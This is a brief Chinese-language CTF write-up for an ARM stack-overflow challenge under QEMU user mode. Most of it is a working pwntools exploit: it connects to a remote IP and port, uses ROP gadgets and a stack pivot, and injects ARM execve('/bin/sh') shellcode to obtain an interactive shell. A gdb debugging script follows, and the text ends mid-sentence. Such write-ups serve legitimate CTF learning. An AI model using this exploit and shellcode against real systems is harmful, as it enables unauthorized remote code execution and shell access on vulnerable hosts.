栈溢出,ARM题目的一般环境是QEMU用户态,默认不支持NX,故直接ROP+栈迁移然后写shellcode即可。
from pwn import *
context(arch='arm',os='linux',log_level='debug')
#io = process(["qemu-arm","-g","1234","-L",".","./bin"])
#io = process(["qemu-arm","-L",".","./bin"])
io = remote("139.159.210.220",9999)
shellcode = b'\x02\x20\x42\xe0\x1c\x30\x8f\xe2'
shellcode += b'\x04\x30\x8d\xe5\x08\x20\x8d\xe5'
shellcode += b'\x13\x02\xa0\xe1\x07\x20\xc3\xe5'
shellcode += b'\x04\x30\x8f\xe2\x04\x10\x8d\xe2'
shellcode += b'\x01\x20\xc3\xe5\x0b\x0b\x90\xef'
shellcode += b'/bin/sh;'
pop_r3_pc = 0x00010348
data_addr = 0x00021030
read_addr = 0x000104E8
payload = b'a'*256+p32(data_addr)+p32(pop_r3_pc)+p32(data_addr)+p32(read_addr)
io.sendafter("input: ",payload);sleep(0.1)
io.sendline(p32(data_addr+4)+shellcode)
io.interactive()
gdb脚本:
file bin
set architecture arm
b * 0x00010500
b * 0x000104F4
target remote :1234
其他WP都是用通用gadget做的(我还不会…感觉对于qemu题麻烦了,还要泄露libc啥的,而且exp中立即数太多,看着迷糊: